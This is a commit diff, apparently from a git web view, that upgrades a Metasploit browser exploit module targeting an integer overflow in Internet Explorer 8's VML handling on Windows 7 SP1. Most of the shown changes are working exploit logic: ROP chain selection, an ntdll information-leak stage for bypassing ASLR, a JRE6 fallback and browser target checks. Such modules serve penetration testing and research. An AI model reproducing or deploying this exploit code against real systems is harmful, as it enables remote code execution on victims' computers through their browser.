Working version after the upgrade
parent
9e3388df34
commit
2dedaee9ca
|
@ -28,18 +28,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits an integer overflow vulnerability on Internet Explorer.
|
||||
The vulnerability exists in the handling of the dashstyle.array length for vml
|
||||
shapes on the vgx.dll module. This module has been tested successfully on Windows 7
|
||||
SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
|
||||
to use an info leak to disclose the ntdll.dll base address is provided. This target
|
||||
requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
|
||||
installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
|
||||
shapes on the vgx.dll module.
|
||||
|
||||
This module has been built and tested specifically against Windows 7 SP1 with
|
||||
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
|
||||
bypass ASLR, and by default the info leak is used. The ntdll version should be
|
||||
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched
|
||||
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001).
|
||||
|
||||
If you wish to try the JRE6 component instead to bypass ASLR, you can set the
|
||||
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
|
||||
have this particular component, the exploit will refuse the attack.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Nicolas Joly', # Vulnerability discovery, PoC and analysis
|
||||
'4B5F5F4B', # PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
'juan vazquez', # Metasploit module
|
||||
'sinn3r' # BES upgrade
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -61,10 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script/i,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:os_name => OperatingSystems::Match::WINDOWS_7,
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_ver => '8.0',
|
||||
},
|
||||
|
@ -181,10 +189,10 @@ for (var i=1; i < 0x300; i++) {
|
|||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
return code if t.opts['Rop'].nil?
|
||||
|
||||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
case t.opts['Rop']
|
||||
when :jre
|
||||
print_status("Using JRE ROP")
|
||||
stack_pivot = [
|
||||
|
@ -363,13 +371,13 @@ function exploit(){
|
|||
def set_rop(t, rop, info)
|
||||
case rop
|
||||
when /^ntdll$/i
|
||||
t['Rop'] = :ntdll
|
||||
t.opts['Rop'] = :ntdll
|
||||
when /^jre6$/i
|
||||
if info[:java] !~ /1\.6|6\.0/
|
||||
raise RuntimeError, "Target does not have the suitable Java component installed for our attack"
|
||||
raise RuntimeError, "Target does not have the suitable Java component (1.6) installed for our attack"
|
||||
end
|
||||
|
||||
t['Rop'] = :jre
|
||||
t.opts['Rop'] = :jre
|
||||
end
|
||||
|
||||
return t
|
||||
|
@ -379,11 +387,12 @@ function exploit(){
|
|||
begin
|
||||
my_target = set_rop(get_target, datastore['ROP'], target_info)
|
||||
rescue RuntimeError => e
|
||||
print_error(e.message)
|
||||
# This one is just a warning, because it's a requirement check so it's not that scary.
|
||||
print_warning(e.message)
|
||||
return
|
||||
end
|
||||
|
||||
if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
|
||||
if my_target.opts['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
|
||||
html = html_info_leak
|
||||
print_status("Sending HTML to info leak...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
|
Loading…
Reference in New Issue